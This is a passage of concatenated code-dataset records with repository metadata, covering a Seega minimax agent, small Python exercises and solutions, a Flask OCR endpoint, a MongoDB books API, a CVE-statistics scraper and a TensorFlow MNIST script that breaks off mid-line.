new_connected_pieces)\r\n if len(new_connected_pieces) > max_connections:\r\n connected_pieces = new_connected_pieces\r\n\r\n return len(connected_pieces)\r\n\r\n\r\n \"\"\"\r\n Return number of opponents' possibles and\r\n maximums captures for given state\r\n \"\"\"\r\n def opponent_captures(self, state):\r\n dimension = state.board.board_shape\r\n square = state.board.get_board_state()\r\n opp_color = self.position*-1\r\n player_color = self.position\r\n opp_max_cap = 0\r\n opp_possible_cap = 0\r\n\r\n opp_pieces_on_board = state.board.get_player_pieces_on_board(Color(self.position*-1))\r\n for piece in opp_pieces_on_board:\r\n moves = SeegaRules.get_effective_cell_moves(state, piece)\r\n if len(moves) > 0:\r\n move_threat = 0\r\n for move in moves:\r\n # map two steps position\r\n gaps = [(move[0] + a[0], move[1] + a[1]) for a in [(0, 2), (0, -2), (2, 0), (-2, 0)]\r\n if (0 <= move[0] + a[0] < dimension[0]) and (0 <= move[1] + a[1] < dimension[1])]\r\n # map one steps position\r\n neig = [(move[0] + a[0], move[1] + a[1]) for a in [(0, 1), (0, -1), (1, 0), (-1, 0)]\r\n if ((0 <= move[0] + a[0] < dimension[0]) and (0 <= move[1] + a[1] < dimension[1])\r\n and ((move[0] + a[0], move[1] + a[1]) != (dimension[0]//2, dimension[1]//2)))]\r\n\r\n for i in range(len(moves)):\r\n if i < len(gaps) and i < len(neig):\r\n if square[gaps[i][0]][gaps[i][1]]==(opp_color) and square[neig[i][0]][neig[i][1]]==player_color:\r\n move_threat += 1\r\n opp_possible_cap += 1\r\n\r\n if move_threat > opp_max_cap:\r\n opp_max_cap = move_threat\r\n\r\n return opp_possible_cap, opp_max_cap\r\n\r\n \"\"\"\r\n * The evaluate function must return an integer value\r\n representing the utility function of the board.\r\n \"\"\"\r\n def evaluate(self, state):\r\n evaluate_score = 0\r\n if state.phase==2:\r\n\r\n # Defensive index\r\n defensive_idx = self.defensive_evaluation(state)\r\n\r\n # Pieces Balance\r\n age_pieces = len(state.board.get_player_pieces_on_board(Color(self.position)))\r\n opp_pieces = len(state.board.get_player_pieces_on_board(Color(self.position*-1)))\r\n\r\n # Corner and Edges\r\n age_conners, age_egdes = self.corner_edges(state)\r\n opp_corners, opp_edges = self.corner_edges(state)\r\n\r\n # Opponents threats\r\n ## opp_possible_cap = self.opponent_captures(state)[0]\r\n opp_max_cap = self.opponent_captures(state)[1]\r\n\r\n # Connected pieces\r\n age_structure = self.get_conn_pieces_num(state, Color(self.position))\r\n opp_structure = self.get_conn_pieces_num(state, Color(self.position*-1))\r\n\r\n evaluate_score += (age_pieces - opp_pieces)*5 # Difference in pieces\r\n evaluate_score += age_conners*2 # Count corner pieces 3 times in total as they are uncapturable\r\n evaluate_score += age_egdes # Count edge pieces 2 times in total as they are more difficult to capture than center pieces but still capturable\r\n evaluate_score -= opp_edges # Decrease for opponent edge pieces as if we can capture some it is very good. No decrease for corner pieces as we can not capture them\r\n evaluate_score -= opp_max_cap # Decrease for direct captures the opponent can make\r\n evaluate_score += age_structure # Increase for the size of our biggest structure\r\n evaluate_score -= opp_structure # Decrease for the size of the opponent structure\r\n evaluate_score += 2 * defensive_idx\r\n\r\n return evaluate_score\r\n\r\n \"\"\"\r\n Specific methods for a Seega player (do not modify)\r\n \"\"\"\r\n def set_score(self, new_score):\r\n self.score = new_score\r\n\r\n def update_player_infos(self, infos):\r\n self.in_hand = infos['in_hand']\r\n self.score = infos['score']\r\n\r\n def reset_player_informations(self):\r\n self.in_hand = 12\r\n self.score = 0\r\n\r\n\r\n\r\n\"\"\"\r\nMiniMax and AlphaBeta algorithms.\r\nAdapted from:\r\n Author: Cyrille Dejemeppe \r\n Copyright (C) 2014, Universite catholique de Louvain\r\n GNU General Public License \r\n\"\"\"\r\n\r\ninf = float(\"inf\")\r\n\r\ndef minimax_search(state, player, prune=True):\r\n \"\"\"Perform a MiniMax/AlphaBeta search and return the best action.\r\n\r\n Arguments:\r\n state -- initial state\r\n player -- a concrete instance of class AI implementing an Alpha-Beta player\r\n prune -- whether to use AlphaBeta pruning\r\n\r\n \"\"\"\r\n def max_value(state, alpha, beta, depth):\r\n if player.cutoff(state, depth):\r\n return player.evaluate(state), None\r\n val = -inf\r\n action = None\r\n for a, s in player.successors(state):\r\n if s.get_latest_player() == s.get_next_player(): # next turn is for the same player\r\n v, _ = max_value(s, alpha, beta, depth + 1)\r\n else: # next turn is for the other one\r\n v, _ = min_value(s, alpha, beta, depth + 1)\r\n if v > val:\r\n val = v\r\n action = a\r\n if prune:\r\n if v >= beta:\r\n return v, a\r\n alpha = max(alpha, v)\r\n return val, action\r\n\r\n def min_value(state, alpha, beta, depth):\r\n if player.cutoff(state, depth):\r\n return player.evaluate(state), None\r\n val = inf\r\n action = None\r\n for a, s in player.successors(state):\r\n if s.get_latest_player() == s.get_next_player(): # next turn is for the same player\r\n v, _ = min_value(s, alpha, beta, depth + 1)\r\n else: # next turn is for the other one\r\n v, _ = max_value(s, alpha, beta, depth + 1)\r\n if v < val:\r\n val = v\r\n action = a\r\n if prune:\r\n if v <= alpha:\r\n return v, a\r\n beta = min(beta, v)\r\n return val, action\r\n\r\n _, action = max_value(state, -inf, inf, 0)\r\n return action\r\n","repo_name":"Breno-st/artificial-intelligence","sub_path":"adversarial-search-seega/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":13614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2760578285","text":"import math\r\n\r\nwhile True:\r\n print(\"\"\"\r\n *************************\r\n\r\n 1_ Çarpma\r\n 2_ Bölme\r\n 3_ Toplama\r\n 4_ Çıkarma\r\n 5_ Üs alma\r\n 6_ cos(x)\r\n 7_ sin(x)\r\n 8_ tan(x)\r\n 9_ Faktöriyel\r\n 10_ Karekök alma\r\n\r\n !!! ÇIKMAK İÇİN Q YA BASIN !!!\r\n *************************\r\n \"\"\")\r\n islem = int(input(\"Lütfen yapmak istediğiniz işlemin numarasını girin:\"))\r\n\r\n if islem == 1:\r\n a = int(input(\"İlk sayı:\"))\r\n b = int(input(\"İkinci sayı:\"))\r\n print(\"{} x {} = {} \".format(a, b, a*b))\r\n elif islem == 2:\r\n a = int(input(\"İlk sayı:\"))\r\n b = int(input(\"İkinci sayı:\"))\r\n print(\"{} / {} = {} \".format(a, b, a / b))\r\n elif islem == 3:\r\n a = int(input(\"İlk sayı:\"))\r\n b = int(input(\"İkinci sayı:\"))\r\n print(\"{} + {} = {} \".format(a, b, a + b))\r\n elif islem == 4:\r\n a = int(input(\"İlk sayı:\"))\r\n b = int(input(\"İkinci sayı:\"))\r\n print(\"{} - {} = {} \".format(a, b, a - b))\r\n elif islem == 5:\r\n a = int(input(\"Taban:\"))\r\n b = int(input(\"Üs:\"))\r\n print(\"{} ^ {} = {} \".format(a, b, pow(a, b)))\r\n elif islem == 6:\r\n a = int(input(\"Açıyı girin:\"))\r\n print(\"cos{} = {} \".format(a, math.cos(math.radians(a))))\r\n elif islem == 7:\r\n a = int(input(\"Açıyı girin:\"))\r\n print(\"sin{} = {} \".format(a, math.sin(math.radians(a))))\r\n elif islem == 8:\r\n a = int(input(\"Açıyı girin:\"))\r\n print(\"tan{} = {} \".format(a, math.tan(math.radians(a))))\r\n elif islem == 9:\r\n a = int(input(\"Faktöriyeli bulunacak sayıyı girin:\"))\r\n print(\"{}! = {}\".format(a, math.factorial(a)))\r\n elif islem == 10:\r\n a = int(input(\"Karekökü alınacak sayıyı girin:\"))\r\n print(\"{}^(0.5) = {}\".format(a, math.sqrt(a)))\r\n elif islem == \"q\":\r\n break\r\n else:\r\n print(\"Yanlış bir tuşa bastınız tekrar deneyin...\")\r\n\r\n","repo_name":"betulerbay/kodlama_egzersizler_python","sub_path":"Ödevler/Modüller/hesap_makinesi.py","file_name":"hesap_makinesi.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"31907774602","text":"# https://programmers.co.kr/learn/courses/30/lessons/92334?language=python3\nfrom collections import defaultdict, Counter\n\ndef solution(id_list, report, k):\n answer = []\n \n total_dict = defaultdict(set)\n for member in id_list:\n total_dict[member]\n \n for rep in report:\n reporter, reported = rep.split(\" \")\n total_dict[reporter].add(reported)\n \n report_cnt = defaultdict(int)\n for reporter in total_dict:\n for reported in total_dict[reporter] :\n report_cnt[reported]+=1\n \n for reporter in total_dict:\n cnt = 0\n for reported in total_dict[reporter]:\n if reported in report_cnt:\n if report_cnt[reported] >= k:\n cnt+=1\n answer.append(cnt)\n \n return answer\n'''\n 테스트 1 〉\t통과 (0.01ms, 10.3MB)\n 테스트 2 〉\t통과 (0.02ms, 10.2MB)\n 테스트 3 〉\t통과 (137.30ms, 44.2MB)\n 테스트 4 〉\t통과 (0.04ms, 10.2MB)\n 테스트 5 〉\t통과 (0.04ms, 10.4MB)\n 테스트 6 〉\t통과 (0.94ms, 10.5MB)\n 테스트 7 〉\t통과 (1.93ms, 10.6MB)\n 테스트 8 〉\t통과 (3.22ms, 10.9MB)\n 테스트 9 〉\t통과 (61.14ms, 26.7MB)\n테스트 10 〉\t통과 (59.98ms, 26.3MB)\n테스트 11 〉\t통과 (133.68ms, 44.3MB)\n테스트 12 〉\t통과 (0.26ms, 10.4MB)\n테스트 13 〉\t통과 (0.27ms, 10.4MB)\n테스트 14 〉\t통과 (54.25ms, 23.4MB)\n테스트 15 〉\t통과 (98.78ms, 38.5MB)\n테스트 16 〉\t통과 (0.15ms, 10.3MB)\n테스트 17 〉\t통과 (0.25ms, 10.1MB)\n테스트 18 〉\t통과 (0.58ms, 10.2MB)\n테스트 19 〉\t통과 (0.67ms, 10.4MB)\n테스트 20 〉\t통과 (72.92ms, 23.3MB)\n테스트 21 〉\t통과 (104.39ms, 38.6MB)\n테스트 22 〉\t통과 (0.01ms, 10.2MB)\n테스트 23 〉\t통과 (0.01ms, 10.2MB)\n테스트 24 〉\t통과 (0.01ms, 10.1MB)\n'''\n\ndef solution2(id_list, report, k):\n answer = []\n \n total_dict = defaultdict(set)\n for member in id_list:\n total_dict[member]\n \n for rep in report:\n reporter, reported = rep.split(\" \")\n total_dict[reporter].add(reported)\n \n total_report= []\n for member, reported in total_dict.items():\n total_report.extend(list(reported))\n total_report = dict(Counter(total_report))\n ban_member = [reported for reported, report_num in total_report.items() if report_num >= k]\n\n for member in total_dict:\n cnt = 0\n for reported in total_dict[member]:\n if reported in ban_member:\n cnt+=1\n answer.append(cnt)\n \n return answer\n'''\n 테스트 1 〉\t통과 (0.04ms, 10.2MB)\n 테스트 2 〉\t통과 (0.04ms, 10.2MB)\n 테스트 3 〉\t통과 (1158.12ms, 45.7MB)\n 테스트 4 〉\t통과 (0.06ms, 10.2MB)\n 테스트 5 〉\t통과 (0.06ms, 10MB)\n 테스트 6 〉\t통과 (0.96ms, 10.6MB)\n 테스트 7 〉\t통과 (2.16ms, 10.7MB)\n 테스트 8 〉\t통과 (3.77ms, 11MB)\n 테스트 9 〉\t통과 (302.58ms, 27MB)\n테스트 10 〉\t통과 (58.97ms, 26.9MB)\n테스트 11 〉\t통과 (624.81ms, 45.6MB)\n테스트 12 〉\t통과 (0.86ms, 10.3MB)\n테스트 13 〉\t통과 (0.30ms, 10.4MB)\n테스트 14 〉\t통과 (393.40ms, 23.9MB)\n테스트 15 〉\t통과 (112.93ms, 39MB)\n테스트 16 〉\t통과 (0.20ms, 10.4MB)\n테스트 17 〉\t통과 (0.29ms, 10.3MB)\n테스트 18 〉\t통과 (0.71ms, 10.2MB)\n테스트 19 〉\t통과 (1.25ms, 10.4MB)\n테스트 20 〉\t통과 (359.14ms, 24MB)\n테스트 21 〉\t통과 (596.00ms, 39.1MB)\n테스트 22 〉\t통과 (0.04ms, 10.1MB)\n테스트 23 〉\t통과 (0.03ms, 10.2MB)\n테스트 24 〉\t통과 (0.03ms, 10.3MB)\n'''\n\n\nif __name__ == '__main__':\n input_args = [\n ([\"muzi\", \"frodo\", \"apeach\", \"neo\"], [\"muzi frodo\", \"apeach frodo\", \"frodo neo\", \"muzi neo\", \"apeach muzi\"], 2),\n ([\"con\", \"ryan\"], [\"ryan con\", \"ryan con\", \"ryan con\", \"ryan con\"], 3),\n ]\n for id_list, report, k in input_args:\n solution2(id_list, report, k)\n print()","repo_name":"ljh415/algorithm","sub_path":"programmers/singo.py","file_name":"singo.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"36243850249","text":"import torch\nfrom transformers import RobertaForMaskedLM, AutoTokenizer, AutoConfig\nfrom autocuda import auto_cuda\n\nfrom entity.instruction import Instruction\n\n\nclass Perplexity(object):\n def __init__(self, model=\"roberta-base\", device=\"cuda\"):\n assert model, \"The model must not be None\"\n self.device = device if device else auto_cuda()\n pretrained_config = AutoConfig.from_pretrained(model)\n\n self.tokenizer = AutoTokenizer.from_pretrained(model)\n self.mlm = RobertaForMaskedLM(pretrained_config).to(self.device)\n\n def calculate_perplexity(self, prompt):\n inputs = self.tokenizer(\n str(prompt), return_tensors=\"pt\", truncation=True, padding=True\n )\n inputs = inputs.to(self.device)\n with torch.no_grad():\n outputs = self.mlm(**inputs, labels=inputs[\"input_ids\"])\n loss = outputs.loss\n # perplexity = torch.exp(loss)\n perplexity = torch.exp(loss / inputs[\"input_ids\"].size(1))\n\n return perplexity.item()\n\n\nif __name__ == \"__main__\":\n p = Perplexity(device=\"cpu\")\n print(p.calculate_perplexity(Instruction(\"hello world\")))\n","repo_name":"yangheng95/InstOptima","sub_path":"objectives/perplexity.py","file_name":"perplexity.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"10722136222","text":"from flask import request, jsonify\nfrom flask_restx import Resource\nimport numpy as np\nimport base64\nimport json\nimport cv2\nimport imutils\nfrom imutils.contours import sort_contours\nimport requests\n\nfrom sample_project.predict import ns\n\n\n@ns.route('/predicts', methods=['POST'])\nclass Predict(Resource):\n def post(self):\n # Decoding and pre-processing base64 image\n IMAGE_SIZE = (700, 700)\n img_array = np.fromstring(base64.b64decode(request.form['b64']), np.uint8)\n img_array = cv2.imdecode(img_array, cv2.IMREAD_GRAYSCALE)\n gray = cv2.resize(img_array, IMAGE_SIZE)\n blurred = cv2.GaussianBlur(gray, (5, 5), 0)\n edged = cv2.Canny(blurred, 30, 150)\n cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n cnts = imutils.grab_contours(cnts)\n cnts = sort_contours(cnts, method=\"left-to-right\")[0]\n chars = []\n\n for c in cnts:\n (x, y, w, h) = cv2.boundingRect(c)\n\n if (w >= 20 and w <= 150) and (h >= 60 and h <= 150):\n\n roi = gray[y:y + h, x:x + w]\n thresh = cv2.threshold(roi, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\n (tH, tW) = thresh.shape\n\n if tW > tH:\n thresh = imutils.resize(thresh, width=28)\n\n else:\n thresh = imutils.resize(thresh, height=28)\n\n (tH, tW) = thresh.shape\n dX = int(max(0, 28 - tW) / 2.0)\n dY = int(max(0, 28 - tH) / 2.0)\n\n padded = cv2.copyMakeBorder(thresh, top=dY, bottom=dY,\n left=dX, right=dX, borderType=cv2.BORDER_CONSTANT,\n value=(0, 0, 0))\n padded = cv2.resize(padded, (28, 28))\n\n padded = padded.astype(\"float32\") / 255.0\n padded = np.expand_dims(padded, axis=-1)\n\n chars.append((padded, (x, y, w, h)))\n\n chars = np.array([c[0] for c in chars], dtype=\"float32\")\n\n # Creating body for TensorFlow serving request\n data = json.dumps({\"signature_name\": \"serving_default\", \"instances\": chars.tolist()})\n print('Data: {} ... {}'.format(data[:50], data[len(data)-52:]))\n\n headers = {\"content-type\": \"application/json\"}\n\n # Making POST request\n r = requests.post('http://number-model-container.herokuapp.com/v1/models/save_model:predict', data=data, headers=headers)\n\n # Decoding results from TensorFlow Serving server\n preds = json.loads(r.content.decode('utf-8'))\n\n labelNames = \"0123456789\"\n labelNames = [l for l in labelNames]\n\n data = []\n\n for pred in preds['predictions']:\n i = np.argmax(pred)\n prob = pred[i]\n label = labelNames[i]\n item = {\"character\": label, \"score\": prob * 100}\n data.append(item)\n\n print(\"[INFO] {} - {:.2f}%\".format(label, prob * 100))\n \n return jsonify(data)","repo_name":"jkostanje/ocr_app","sub_path":"sample_project/predict/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19097445842","text":"def permutations(string):\n import math\n import random\n rList = []\n sList = list(string)\n\n # letterCount = {}\n # uniqL = len(set(string))\n\n if len(string) == len(set(string)):\n expectedLength = math.factorial(len(string))\n else:\n expectedLength = (math.factorial(len(string)))/(2*(len(string)-len(set(string))))\n\n while len(rList) < expectedLength:\n #while length of return is smaller than expected length of return calculated by factorial divided by two times the amount of unique characters\n random.shuffle(sList)\n s = ''.join(sList)\n if s not in rList:\n # print('Adding ' + s + ' to return') #REMOVE debug print\n rList.append(s)\n # else:\n # print('Ignoring duplicate ' + s) \n \n\n\n\n\n print(sorted(rList)) #REMOVE\n return rList\n\npermutations('a')\npermutations('ab')\npermutations('aabb')","repo_name":"DiogenesOfMiami/CodeWars","sub_path":"permutations2.py","file_name":"permutations2.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25898040227","text":"from pymongo import MongoClient\nimport time\nfrom flask_login import current_user\nif __name__ != '__main__':\n from app import app\nimport bson\nfrom errorCodes import *\nclass Books:\n\n def __init__(self):\n app.config['authorsDB'] = 'authors'\n app.config['booksDB'] = 'books'\n self.db = MongoClient(app.config['MONGO_URI'])\n self.books = self.db[app.config['booksDB']][app.config['booksDB']]\n self.authors = self.db[app.config['authorsDB']][app.config['authorsDB']]\n \n def insertBook(self, data):\n authors = data[\"authorNames\"].split(\",\")\n userId = current_user.userId['userId']\n print(userId)\n for authorName in authors:\n author = Author(self.authors, authorName)\n author.insert_author()\n structure = { \"bookName\": data['bookName'],\n \"authorName\": author.authorName,\n \"authorId\": author.authorId,\n \"MRP\": data['MRP'],\n \"rental\": data['rental'],\n \"securityDeposit\": data['securityDeposit'],\n \"timePeriod\" : data[\"timePeriod\"],\n \"qtyAvailable\": data['qtyAvailable'],\n \"seller\": userId,\n \"otherdata\": data['otherDetails'], #Book_Images #description #any other message for user'] \n \"timestamp\":time.time()\n }\n self.books.insert_one(structure)\n del structure['authorId']\n del structure['authorName']\n structure['bookId'] = str(structure['_id'])\n author.insertBooksInAuthor(structure['_id'])\n del structure['_id']\n print(structure)\n return structure\n \n # def find\n\n\nclass Author:\n\n def __init__(self, authorDB, authorName = None, authorId = None):\n self.authorDB = authorDB\n result = self.authorDB.find_one({\"$or\": [{\"AUTHOR_NAME\": authorName}, {\"_id\": bson.ObjectId(authorId)}]})\n if result:\n self.exist = True\n self.authorId = result['_id']\n self.authorName = result['AUTHOR_NAME']\n self.books = result['books']\n else:\n self.exist = False\n self.authorId = None\n self.authorName = authorName\n self.books = []\n\n def existing(self):\n return self.exist\n \n def insert_author(self):\n if (not self.exist) and isinstance(self.authorName, str):\n structure = {\"AUTHOR_NAME\": self.authorName, \"books\": self.books}\n self.authorDB.insert(structure)\n self.authorId = structure['_id']\n self.exist = True\n else:\n return E24 if self.exist else E15\n \n def insertBooksInAuthor(self, bookId):\n if (not self.exist):\n self.insert_author()\n self.authorDB.find_one_and_update({\"_id\": self.authorId},\n {\"$push\": \n {\"books\": {\n \"$each\": [str(bookId)]\n }\n }\n })\n \n\n\n\n \n","repo_name":"leetanshaj/booksAPI","sub_path":"books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":3138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"30099007846","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\n# Cloudflare의 보안 서비스에 의해 접근이 차단되었다는 메시지가 출력되어서 다음과 같이 사용함\r\nheaders = {\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"\r\n}\r\n\r\nurl = \"https://www.cvedetails.com/vulnerabilities-by-types.php\"\r\nreq = requests.get(url, headers=headers, verify=True)\r\nsoup = BeautifulSoup(req.text, 'html.parser')\r\n\r\n# 'body' 태그 내에서 'table' 태그\r\ntables = soup.body.find_all('table')\r\n# 테이블을 선택\r\ntable = tables[0] \r\n# 테이블 모든 tr 태그\r\nrows = table.find_all('tr')\r\n\r\ndata = {}\r\nfor row in rows:\r\n th = row.find('th')\r\n a = th.find('a') if th else None\r\n if a:\r\n year = a.text.strip()\r\n # 만약 추출한 텍스트가 '2023'라면,\r\n if year == '2023':\r\n tds = row.find_all('td')\r\n for td in tds:\r\n a = td.find('a')\r\n if a:\r\n # 'a' 태그의 'title' 속성을 key로, 텍스트를 value로 하는 항목을 데이터에 추가합니다.\r\n key = a.get('title').replace(' vulnerabilities for 2023', '') # replace 함수를 사용하여 ' vulnerabilities for 2023' 부분을 제거합니다.\r\n value = a.text.strip()\r\n data[key] = value\r\n\r\nprint(data)\r\n\r\n# # 각 행을 반복하며 처리합니다.\r\n# for row in rows:\r\n# # 'th' 태그를 찾습니다.\r\n# th = row.find('th')\r\n# # 'th' 태그 내의 'a' 태그를 찾습니다.\r\n# a = th.find('a') if th else None\r\n# # 'a' 태그가 있으면,\r\n# if a:\r\n# # 'a' 태그의 텍스트를 추출합니다.\r\n# year = a.text.strip()\r\n# # 만약 추출한 텍스트가 '2023'라면,\r\n# if year == '2023':\r\n# # 해당 행에서 'td' 태그의 텍스트를 모두 출력합니다.\r\n# data = [td.text.strip() for td in row.find_all('td')]\r\n# print(data)","repo_name":"gituserYun/PythonProject","sub_path":"Crowling/cve_scraping.py","file_name":"cve_scraping.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7450321632","text":"\"\"\"Select field.\"\"\"\nfrom collections.abc import Sequence\nfrom enum import Enum\nfrom typing import Any, List, Literal, Optional, Union\n\nimport attr\nfrom attrs import frozen, validators\nfrom oes.interview.config.field import AskField, FieldBase\nfrom oes.interview.parsing.location import Location\nfrom oes.template import Template\n\n\n@frozen\nclass Option:\n \"\"\"A :class:`SelectField` option.\"\"\"\n\n value: Any\n label: Optional[Template] = None\n\n\nclass SelectComponentType(str, Enum):\n dropdown = \"dropdown\"\n checkbox = \"checkbox\"\n radio = \"radio\"\n\n\n@frozen\nclass SelectAskField(AskField):\n \"\"\"AskField for a select field.\"\"\"\n\n type: Literal[\"select\"] = \"select\"\n optional: bool = False\n default: Optional[Union[int, Sequence[int]]] = None\n label: Optional[str] = None\n\n require_value: Optional[Union[int, Sequence[int]]] = None\n require_value_message: Optional[str] = None\n\n component: SelectComponentType = SelectComponentType.dropdown\n \"\"\"The select component type.\"\"\"\n\n min: int = 1\n \"\"\"The minimum number of items.\"\"\"\n\n max: int = 1\n \"\"\"The maximum number of items.\"\"\"\n\n options: Sequence[str] = ()\n \"\"\"The list of options.\"\"\"\n\n input_mode: Optional[str] = None\n \"\"\"The HTML input mode for this field.\"\"\"\n\n autocomplete: Optional[str] = None\n \"\"\"The autocomplete type for this field's input.\"\"\"\n\n\n@frozen\nclass SelectField(FieldBase):\n \"\"\"Select field.\"\"\"\n\n type: Literal[\"select\"] = \"select\"\n set: Optional[Location] = None\n optional: bool = False\n default: Optional[Union[int, Sequence[int]]] = None\n label: Optional[Template] = None\n\n require_value: Optional[Union[int, Sequence[int]]] = None\n require_value_message: Optional[str] = None\n\n min: int = 1\n \"\"\"The minimum number of items.\"\"\"\n\n max: int = 1\n \"\"\"The maximum number of items.\"\"\"\n\n component: SelectComponentType = SelectComponentType.dropdown\n \"\"\"The select component type.\"\"\"\n\n input_mode: Optional[str] = None\n \"\"\"The HTML input mode for this field.\"\"\"\n\n autocomplete: Optional[str] = None\n \"\"\"The autocomplete type for this field's input.\"\"\"\n\n options: list[Option] = []\n \"\"\"The options.\"\"\"\n\n def get_ask_field(self, context: dict[str, Any]) -> SelectAskField:\n return SelectAskField(\n type=self.type,\n optional=self.optional,\n default=self.default,\n label=self.label.render(**context) if self.label else None,\n min=self.min,\n max=self.max,\n component=self.component,\n input_mode=self.input_mode,\n autocomplete=self.autocomplete,\n options=tuple(\n opt.label.render(**context) if opt.label else str(opt.value)\n for opt in self.options\n ),\n require_value=self.require_value,\n require_value_message=self.require_value_message,\n )\n\n def get_python_type(self) -> object:\n if self.max == 1:\n if self.min == 0:\n return Optional[int]\n else:\n return int\n else:\n return List[int]\n\n def _validate_size(self, instance, attribute, value):\n if self.max == 1 and value is None and self.min == 1:\n raise ValueError(f\"{attribute.name}: A value is required\")\n\n if self.max > 1 and len(value) < self.min:\n raise ValueError(f\"{attribute.name}: At least {self.min} items required\")\n\n if self.max > 1 and len(value) > self.max:\n raise ValueError(f\"{attribute.name}: At most {self.max} items required\")\n\n def _validate_required_value(self, i, a, v):\n # values/shape should already have been validated\n if self.require_value is not None and v is not None:\n expected = (\n self._transform_option_list(sorted(self.require_value))\n if isinstance(self.require_value, (list, tuple, set, frozenset))\n else self._transform_single_option(self.require_value)\n )\n given = v\n if expected != given:\n raise ValueError(\n f\"{a.name}: {self.require_value_message or 'Required'}\"\n )\n\n def get_field_info(self) -> Any:\n return attr.ib(\n type=self.get_python_type(),\n converter=self.transform_options,\n validator=[\n validators.optional(\n [\n self._validate_size,\n self._validate_required_value,\n ]\n )\n ],\n )\n\n def option_to_value(self, option: Any) -> Any:\n \"\"\"Get an option value by its index.\"\"\"\n if not isinstance(option, int):\n raise ValueError(f\"Not a valid option: {option}\")\n\n try:\n option_entry = self.options[option]\n except IndexError:\n raise ValueError(f\"Not a valid option: {option}\")\n\n return option_entry.value\n\n def _transform_single_option(self, value: Any) -> Any:\n if value is None:\n return None\n else:\n return self.option_to_value(value)\n\n def _transform_option_list(self, value: Any) -> Any:\n if isinstance(value, (list, tuple)):\n # sort values for consistent comparison\n transformed = [self.option_to_value(v) for v in sorted(value)]\n number_set = set(value)\n if len(number_set) != len(transformed):\n raise ValueError(\"Duplicate values not allowed\")\n\n return transformed\n else:\n raise ValueError(\"Not a list\")\n\n def transform_options(self, value: Any) -> Any:\n if self.max == 1:\n return self._transform_single_option(value)\n else:\n return self._transform_option_list(value)\n","repo_name":"Open-Event-Systems/interview","sub_path":"python/src/oes/interview/config/fields/select.py","file_name":"select.py","file_ext":"py","file_size_in_byte":5853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"6038606903","text":"class Solution:\n def findRelativeRanks(self, score: List[int]) -> List[str]:\n transform = sorted(score, reverse=True)\n my_dict = {}\n for idx, val in enumerate(transform):\n if idx == 0:\n my_dict[val] = \"Gold Medal\"\n elif idx == 1:\n my_dict[val] = \"Silver Medal\"\n elif idx == 2:\n my_dict[val] = \"Bronze Medal\"\n else:\n my_dict[val] = str(idx+1)\n \n out = []\n for i in score:\n out.append(my_dict[i])\n \n return out","repo_name":"rockett-m/LeetCode","sub_path":"0506-relative-ranks/0506-relative-ranks.py","file_name":"0506-relative-ranks.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7427989213","text":"import tensorflow as tf\nimport numpy as np\nimport os\nimport math\nfrom datetime import datetime\nfrom functools import partial\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nmnist = input_data.read_data_sets(\"/tmp/data/\")\n\nn_inputs = 28 * 28\nn_hidden1 = 300\nn_hidden2 = 100\nn_outputs = 10\n\nif 'session' in locals() and session is not None:\n print('Close interactive session')\n session.close()\n\ntf.reset_default_graph()\n\nX = tf.placeholder(tf.float32, shape=(None, n_inputs), name='X')\ny = tf.placeholder(tf.int32, shape=None, name='y')\ntraining = tf.placeholder_with_default(False, shape=(), name='training')\n\nbatch_norm_momentum = 0.9\n\nwith tf.name_scope('dnn'):\n he_init = tf.contrib.layers.variance_scaling_initializer()\n\n my_batch_norm_layer = partial(\n tf.layers.batch_normalization,\n training=training,\n momentum=batch_norm_momentum\n )\n\n my_dense_layer = partial(\n tf.layers.dense,\n kernel_initializer=he_init\n )\n\n hidden1 = my_dense_layer(X, n_hidden1, name='hidden1')\n bn1 = tf.nn.elu(my_batch_norm_layer(hidden1))\n hidden2 = my_dense_layer(bn1, n_hidden2, name='hidden2')\n bn2 = tf.nn.elu(my_batch_norm_layer(hidden2))\n logits_before_bn = my_dense_layer(bn2, n_outputs, name='ooutputs')\n logits = my_batch_norm_layer(logits_before_bn)\n\nwith tf.name_scope('loss'):\n xentropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=y, logits=logits)\n loss = tf.reduce_mean(xentropy, name='loss')\n loss_summary = tf.summary.scalar('log_loss', loss)\n\n\nlearning_rate = 0.01\nwith tf.name_scope('train'):\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n trainig_op = optimizer.minimize(loss)\n\nwith tf.name_scope('eval'):\n correct = tf.nn.in_top_k(logits, y, 1)\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\n accuracy_summary = tf.summary.scalar('accuracy', accuracy)\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\n\n\ndef log_dir(prefix=''):\n now = 